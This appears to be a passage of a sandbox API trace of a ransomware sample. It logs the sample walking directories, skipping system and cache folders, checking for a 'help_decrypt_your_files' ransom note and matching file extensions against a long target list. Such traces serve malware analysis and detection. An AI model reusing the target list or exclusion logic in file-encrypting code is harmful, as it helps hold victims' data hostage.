	[0178.416] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.416] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.416] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.416] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="appdata") returned 0x0
	[0178.416] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.416] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="application data") returned 0x0
	[0178.417] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.417] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="winnt") returned 0x0
	[0178.417] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.417] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="tmp") returned 0x0
	[0178.417] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.417] StrStrW (lpFirst="c:\\users\\all users\\package cache\\*.*", lpSrch="cache") returned="cache\\*.*"
	[0178.417] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0178.418] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbc2dd99f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xbc2dd99f, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="regid.1991-06.com.microsoft", cAlternateFileName="REGID1~1.MIC")) returned 1
	[0178.418] lstrcmpW (lpString1="regid.1991-06.com.microsoft", lpString2="..") returned 1
	[0178.418] lstrcmpW (lpString1="regid.1991-06.com.microsoft", lpString2=".") returned 1
	[0178.418] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0178.418] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0178.418] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="regid.1991-06.com.microsoft" | out: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft") returned="C:\\Users\\All Users\\regid.1991-06.com.microsoft"
	[0178.418] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\regid.1991-06.com.microsoft" | out: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft") returned="C:\\Users\\All Users\\regid.1991-06.com.microsoft"
	[0178.418] lstrcatW (in: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\") returned="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\"
	[0178.418] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\" | out: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\") returned="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\"
	[0178.419] lstrcatW (in: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*.*") returned="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*.*"
	[0178.419] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*.*" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbc2dd99f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xbc2dd99f, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0178.455] lstrlenW (lpString="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*.*") returned 50
	[0178.455] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.455] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\*.*", cchLength=0x32 | out: lpsz="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*") returned 0x32
	[0178.456] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.456] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="windows") returned 0x0
	[0178.456] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.456] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="boot") returned 0x0
	[0178.456] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.456] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="system volume information") returned 0x0
	[0178.456] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.456] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.457] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.457] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="temp") returned 0x0
	[0178.457] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.457] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="program files") returned 0x0
	[0178.457] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.457] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.457] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.457] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="appdata") returned 0x0
	[0178.458] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.458] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="application data") returned 0x0
	[0178.458] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.458] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="winnt") returned 0x0
	[0178.458] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.458] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="tmp") returned 0x0
	[0178.458] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.458] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="cache") returned 0x0
	[0178.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.459] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.459] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="webcache") returned 0x0
	[0178.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.459] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="inetcache") returned 0x0
	[0178.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.460] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="nvidia") returned 0x0
	[0178.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.460] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="packages") returned 0x0
	[0178.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.460] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="cookies") returned 0x0
	[0178.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.461] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\*.*", lpSrch="programdata") returned 0x0
	[0178.461] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbc2dd99f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xbc2dd99f, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.461] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda99800, ftCreationTime.dwHighDateTime=0x1d0cb68, ftLastAccessTime.dwLowDateTime=0xbc2dd99f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xda99800, ftLastWriteTime.dwHighDateTime=0x1d0cb68, nFileSizeHigh=0x0, nFileSizeLow=0x429, dwReserved0=0x0, dwReserved1=0x0, cFileName="regid.1991-06.com.microsoft Microsoft Office Professional Plus 2016.swidtag", cAlternateFileName="REGID1~1.SWI")) returned 1
	[0178.461] lstrcmpW (lpString1="regid.1991-06.com.microsoft Microsoft Office Professional Plus 2016.swidtag", lpString2="..") returned 1
	[0178.461] lstrcmpW (lpString1="regid.1991-06.com.microsoft Microsoft Office Professional Plus 2016.swidtag", lpString2=".") returned 1
	[0178.461] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\" | out: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\") returned="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\"
	[0178.462] lstrcatW (in: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\", lpString2="regid.1991-06.com.microsoft Microsoft Office Professional Plus 2016.swidtag" | out: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Microsoft Office Professional Plus 2016.swidtag") returned="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Microsoft Office Professional Plus 2016.swidtag"
	[0178.462] lstrlenW (lpString="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Microsoft Office Professional Plus 2016.swidtag") returned 122
	[0178.462] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.462] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Microsoft Office Professional Plus 2016.swidtag", cchLength=0x7a | out: lpsz="c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft microsoft office professional plus 2016.swidtag") returned 0x7a
	[0178.462] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.462] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft microsoft office professional plus 2016.swidtag", lpSrch="help_decrypt_your_files") returned 0x0
	[0178.462] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft microsoft office professional plus 2016.swidtag" | out: lpString1="c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft microsoft office professional plus 2016.swidtag") returned="c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft microsoft office professional plus 2016.swidtag"
	[0178.462] lstrlenW (lpString="c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft microsoft office professional plus 2016.swidtag") returned 122
	[0178.463] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.463] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.463] StrStrW (lpFirst=".swidtag", lpSrch=".") returned=".swidtag"
	[0178.463] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.463] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swidtag") returned 0x0
	[0178.464] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ac00f7d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3ac00f7d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3ac00f7d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", cAlternateFileName="")) returned 1
	[0178.464] lstrcmpW (lpString1="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", lpString2="..") returned 1
	[0178.464] lstrcmpW (lpString1="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", lpString2=".") returned 1
	[0178.464] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\" | out: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\") returned="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\"
	[0178.464] lstrcatW (in: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\", lpString2="regid.1991-06.com.microsoft_Windows-10-Pro.swidtag" | out: lpString1="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag") returned="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag"
	[0178.464] lstrlenW (lpString="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag") returned 97
	[0178.464] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.464] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag", cchLength=0x61 | out: lpsz="c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag") returned 0x61
	[0178.464] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.465] StrStrW (lpFirst="c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag", lpSrch="help_decrypt_your_files") returned 0x0
	[0178.465] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag" | out: lpString1="c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag") returned="c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag"
	[0178.465] lstrlenW (lpString="c:\\users\\all users\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft_windows-10-pro.swidtag") returned 97
	[0178.465] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.465] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.465] StrStrW (lpFirst=".swidtag", lpSrch=".") returned=".swidtag"
	[0178.465] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.466] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng